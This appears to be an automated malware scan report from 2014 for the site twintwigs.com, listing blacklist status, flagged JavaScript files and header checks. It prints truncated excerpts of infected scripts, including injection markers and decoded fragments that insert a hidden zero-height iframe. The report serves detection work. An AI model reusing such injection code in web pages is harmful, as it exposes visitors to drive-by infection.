Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=twintwigs.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://twintwigs.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://twintwigs.com/ | 200 OK Content-Length: 19220 Content-Type: text/html | clean |
http://twintwigs.com/js/maxheight.js | 200 OK Content-Length: 10684 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ElementMaxHeight = function() { this.initialize.apply(this, arguments); } ElementMaxHeight.prototype = { initialize: function(className) { this.elements = document.getElementsByClassName(className || 'maxheight'); this.textElement = document.createElement('span'); this.textElement.appendChild(document.createTextNode('A')); this.textElement.style.display = 'block'; this.textElement.style.position = 'absolute'; this.textEl if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://twintwigs.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 64700 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://twintwigs.com/js/cufon-yui.js | 200 OK Content-Length: 25706 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&& if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://twintwigs.com/js/cufon-replace.js | 200 OK Content-Length: 7873 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.replace('#header ul li a', { fontFamily: 'Swis721 Th BT', hover:true });
Cufon.replace('#content ul li a', { fontFamily: 'Myriad Pro', hover:true }); Cufon.replace('.indent-wrapper', { fontFamily: 'Myriad Pro l', hover:true }); Cufon.replace('h2', { fontFamily: 'Quicksand Light' }) Cufon.replace('.link', { fontFamily: 'Calibri', hover:true }) Cufon.replace('#header .button', { fontFamily: 'Calibri', hover:true }) try{prototype%2;}catch(asd){x=2;}try{q=document[ if(f)e(s);} Antivirus reports:
| ||
http://twintwigs.com/js/Swis721_Th_BT_400.font.js | 200 OK Content-Length: 44860 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":187,"face":{"font-family":"Swis721 Th BT","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 3 3 2 2 2 2 2 4","ascent":"274","descent":"-86","x-height":"5","bbox":"-20 -347 360 85","underline-thickness":"7.55859","underline-position":"-33.3984","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":93},"!":{"d":"50,0r0,-32r12,0r0,32r-12,0xm52,-65r-4,-193r14,0r-2,193r-8,0","w":110},"\"":{"d":"63,-252r12,0r0,97r-12,0r0,-97xm18,-252r12,0r0,97r-12,0r if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://twintwigs.com/js/Quicksand_Light_300.font.js | 200 OK Content-Length: 57548 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":220,"face":{"font-family":"Quicksand Light","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 7 3 3 0 0 0 6 0 0","ascent":"288","descent":"-72","bbox":"-9 -332 386.375 77","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":108},"B":{"d":"37,-5r0,-242v0,-3,2,-5,6,-5v62,-6,117,4,118,60v0,23,-13,43,-32,53v32,6,57,35,57,69v0,39,-31,70,-70,70r-74,0v-3,0,-5,-2,-5,-5xm46,-9r70,0v34,0,61,-27,61,-61v if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://twintwigs.com/js/Calibri_400.font.js | 200 OK Content-Length: 35274 Content-Type: application/x-javascript | clean |
http://twintwigs.com/js/Myriad_Pro_400.font.js | 200 OK Content-Length: 85062 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":184,"face":{"font-family":"Myriad Pro","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 3 3 4 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-17 -316 349 90","underline-thickness":"18","underline-position":"-18","stemh":"24","stemv":"32","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":76},"\u00a0":{"w":76,"k":{"T":15,"V":13,"W":13,"Y":17,"\u00dd":17,"\u2018":30,"\u201c":30}},"!":{"d":"54,-69r-25,0r-5,-174r35,0xm41,4v-12 if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://twintwigs.com/js/Myriad_Pro_300.font.js | 200 OK Content-Length: 83002 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Cufon.registerFont({"w":175,"face":{"font-family":"Myriad Pro l","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 4 3 3 4 3 2 2 4","ascent":"270","descent":"-90","x-height":"4","bbox":"-18 -312 349 90","underline-thickness":"18","underline-position":"-18","stemh":"14","stemv":"17","unicode-range":"U+0020-U+2122"},"glyphs":{" ":{"w":78},"\u00a0":{"w":78,"k":{"T":15,"V":13,"W":13,"Y":18,"\u00dd":18,"\u2018":32,"\u201c":32}},"!":{"d":"44,-64r-14,0r-4,-179r22,0xm if(f)e(s);} /*qhk6sa6g1c*/ Antivirus reports:
| ||
http://twintwigs.com/js/loopedslider.js | 200 OK Content-Length: 13561 Content-Type: application/x-javascript | clean |
http://twintwigs.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 15766 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://twintwigs.com/index.html | 200 OK Content-Length: 19220 Content-Type: text/html | clean |
http://twintwigs.com/About.html | 200 OK Content-Length: 11377 Content-Type: text/html | clean |
http://twintwigs.com/Product.html | 200 OK Content-Length: 14423 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: twintwigs.com
Result:
HTTP/1.1 200 OK
Date: Wed, 01 Oct 2014 16:04:30 GMT
ETag: "68e032ca114cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 19220
Content-Type: text/html
Last-Modified: Sat, 07 Apr 2012 09:30:19 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...19220 bytes of data.
GET / HTTP/1.1
Host: twintwigs.com
Result:
HTTP/1.1 200 OK
Date: Wed, 01 Oct 2014 16:04:30 GMT
ETag: "68e032ca114cd1:0"
Server: Microsoft-IIS/7.5
Content-Length: 19220
Content-Type: text/html
Last-Modified: Sat, 07 Apr 2012 09:30:19 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...19220 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: twintwigs.com
Referer: http://www.google.com/search?q=twintwigs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: twintwigs.com
Referer: http://www.google.com/search?q=twintwigs.com
Result:
The result is similar to the first query. There are no suspicious redirects found.